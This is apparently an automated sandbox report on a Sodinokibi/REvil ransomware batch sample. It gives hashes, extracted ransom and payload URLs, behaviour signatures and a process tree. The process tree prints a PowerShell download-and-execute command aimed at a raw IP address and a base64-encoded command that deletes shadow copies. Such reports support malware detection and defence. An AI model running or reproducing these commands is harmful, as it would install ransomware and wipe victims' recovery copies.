Analysis
  max time kernel: 122s
  max time network: 118s
  platform: windows10_x64
  resource: win10
  submitted: 19-08-2020 22:10
  Static task: static1
  Behavioral task: behavioral1
    Sample: 6b344dbcf15e9fffe23ce5307af78070.bat
    Resource: win7v200722
  Behavioral task: behavioral2
    Sample: 6b344dbcf15e9fffe23ce5307af78070.bat
    Resource: win10
General
  Target: 6b344dbcf15e9fffe23ce5307af78070.bat
  Size: 215B
  MD5: edcaf035412a5f6b004822eeba9ec0bc
  SHA1: 5b65ca011d951eaa8266950415eb13dc55766d40
  SHA256: a7804db792288327cecffcd3cf6d6addf7ab9d7c56fac80b588aa76e96e0c383
  SHA512: 10e58b8f554cca5133ebb0c33800a2de7e063712a791832eaa505379a7897375737f20bad7c7ce0e6ecd1e79e2ab2d5728529fa6a3750f050d56509503474c02
Malware Config
  Extracted
    http://185.103.242.78/pastes/6b344dbcf15e9fffe23ce5307af78070
  Extracted
    Path: C:\42dh2096-readme.txt
    Family: sodinokibi
    http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/09D8D1069D6958FB
    http://decryptor.cc/09D8D1069D6958FB
Signatures
  Sodin, Sodinokibi, REvil
    Ransomware with advanced anti-analysis and privilege escalation functionality.
  Blacklisted process makes network request (1 IoC)
    Processes: powershell.exe
      flow | pid | process
      1 | 3864 | powershell.exe
  Modifies extensions of user files (6 IoCs)
    Ransomware generally changes the extension on encrypted files.
    Processes: powershell.exe
      description | ioc | process
      File renamed | C:\Users\Admin\Pictures\LimitResolve.tiff => \??\c:\users\admin\pictures\LimitResolve.tiff.42dh2096 | powershell.exe
      File renamed | C:\Users\Admin\Pictures\UninstallDismount.png => \??\c:\users\admin\pictures\UninstallDismount.png.42dh2096 | powershell.exe
      File renamed | C:\Users\Admin\Pictures\OpenStep.raw => \??\c:\users\admin\pictures\OpenStep.raw.42dh2096 | powershell.exe
      File renamed | C:\Users\Admin\Pictures\SaveStart.png => \??\c:\users\admin\pictures\SaveStart.png.42dh2096 | powershell.exe
      File opened for modification | \??\c:\users\admin\pictures\LimitResolve.tiff | powershell.exe
      File renamed | C:\Users\Admin\Pictures\CheckpointCopy.crw => \??\c:\users\admin\pictures\CheckpointCopy.crw.42dh2096 | powershell.exe
  Enumerates connected drives (3 TTPs)
  Modifies service (2 TTPs, 4 IoCs)
    Processes: vssvc.exe
      description | ioc | process
      Key created | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\Registry Writer | vssvc.exe
      Key created | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\COM+ REGDB Writer | vssvc.exe
      Key created | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\ASR Writer | vssvc.exe
      Key created | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\Shadow Copy Optimization Writer | vssvc.exe
  Sets desktop wallpaper using registry (2 TTPs, 1 IoC)
    Processes: powershell.exe
      description | ioc | process
      Set value (str) | \REGISTRY\USER\S-1-5-21-2066881839-3229799743-3576549721-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\AppData\\Local\\Temp\\t430q33.bmp" | powershell.exe
  Drops file in Program Files directory (24 IoCs)
    Processes: powershell.exe
      description | ioc | process
      File opened for modification | \??\c:\program files\StopUndo.potm | powershell.exe
      File opened for modification | \??\c:\program files\ConnectTest.ogg | powershell.exe
      File opened for modification | \??\c:\program files\MountStop.easmx | powershell.exe
      File opened for modification | \??\c:\program files\ResetUnregister.DVR | powershell.exe
      File opened for modification | \??\c:\program files\SaveOut.css | powershell.exe
      File opened for modification | \??\c:\program files\UninstallMerge.ini | powershell.exe
      File opened for modification | \??\c:\program files\EnterOptimize.m1v | powershell.exe
      File opened for modification | \??\c:\program files\InvokeEdit.ttf | powershell.exe
      File opened for modification | \??\c:\program files\DebugDisconnect.otf | powershell.exe
      File opened for modification | \??\c:\program files\DebugGet.001 | powershell.exe
      File opened for modification | \??\c:\program files\DebugStart.edrwx | powershell.exe
      File opened for modification | \??\c:\program files\InitializeEnable.cfg | powershell.exe
      File opened for modification | \??\c:\program files\InstallBlock.wmf | powershell.exe
      File opened for modification | \??\c:\program files\ResumeLock.mht | powershell.exe
      File created | \??\c:\program files (x86)\42dh2096-readme.txt | powershell.exe
      File opened for modification | \??\c:\program files\ApprovePublish.m4a | powershell.exe
      File opened for modification | \??\c:\program files\MergeBlock.mpv2 | powershell.exe
      File opened for modification | \??\c:\program files\OutWatch.aifc | powershell.exe
      File opened for modification | \??\c:\program files\ResetStep.vsx | powershell.exe
      File opened for modification | \??\c:\program files\SearchApprove.mov | powershell.exe
      File opened for modification | \??\c:\program files\StopStart.dwfx | powershell.exe
      File opened for modification | \??\c:\program files\WriteNew.wvx | powershell.exe
      File created | \??\c:\program files\42dh2096-readme.txt | powershell.exe
      File opened for modification | \??\c:\program files\ApproveConvert.au | powershell.exe
  Suspicious behavior: EnumeratesProcesses (8 IoCs)
    Processes: powershell.exe, powershell.exe
      pid | process
      3864 | powershell.exe
      3864 | powershell.exe
      3864 | powershell.exe
      3864 | powershell.exe
      3864 | powershell.exe
      3004 | powershell.exe
      3004 | powershell.exe
      3004 | powershell.exe
  Suspicious use of AdjustPrivilegeToken (7 IoCs)
    Processes: powershell.exe, powershell.exe, vssvc.exe
      description | pid | process
      Token: SeDebugPrivilege | 3864 | powershell.exe
      Token: SeDebugPrivilege | 3864 | powershell.exe
      Token: SeDebugPrivilege | 3004 | powershell.exe
      Token: SeBackupPrivilege | 4000 | vssvc.exe
      Token: SeRestorePrivilege | 4000 | vssvc.exe
      Token: SeAuditPrivilege | 4000 | vssvc.exe
      Token: SeTakeOwnershipPrivilege | 3864 | powershell.exe
  Suspicious use of WriteProcessMemory (6 IoCs)
    Processes: cmd.exe, powershell.exe
      description | pid | process | target process
      PID 344 wrote to memory of 3864 | 344 | cmd.exe | powershell.exe
      PID 344 wrote to memory of 3864 | 344 | cmd.exe | powershell.exe
      PID 344 wrote to memory of 3864 | 344 | cmd.exe | powershell.exe
      PID 3864 wrote to memory of 3004 | 3864 | powershell.exe | powershell.exe
      PID 3864 wrote to memory of 3004 | 3864 | powershell.exe | powershell.exe
      PID 3864 wrote to memory of 3004 | 3864 | powershell.exe | powershell.exe
Processes
  C:\Windows\system32\cmd.exe
    Command line: C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\6b344dbcf15e9fffe23ce5307af78070.bat"
    - Suspicious use of WriteProcessMemory
    PID: 344
    C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      Command line: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "IEX (New-Object System.Net.WebClient).DownloadString('http://185.103.242.78/pastes/6b344dbcf15e9fffe23ce5307af78070');Invoke-LPYNMMII;Start-Sleep -s 10000"
      - Blacklisted process makes network request
      - Modifies extensions of user files
      - Sets desktop wallpaper using registry
      - Drops file in Program Files directory
      - Suspicious behavior: EnumeratesProcesses
      - Suspicious use of AdjustPrivilegeToken
      - Suspicious use of WriteProcessMemory
      PID: 3864
      C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        Command line: powershell -e RwBlAHQALQBXAG0AaQBPAGIAagBlAGMAdAAgAFcAaQBuADMAMgBfAFMAaABhAGQAbwB3AGMAbwBwAHkAIAB8ACAARgBvAHIARQBhAGMAaAAtAE8AYgBqAGUAYwB0ACAAewAkAF8ALgBEAGUAbABlAHQAZQAoACkAOwB9AA==
        - Suspicious behavior: EnumeratesProcesses
        - Suspicious use of AdjustPrivilegeToken
        PID: 3004
  C:\Windows\system32\vssvc.exe
    Command line: C:\Windows\system32\vssvc.exe
    - Modifies service
    - Suspicious use of AdjustPrivilegeToken
    PID: 4000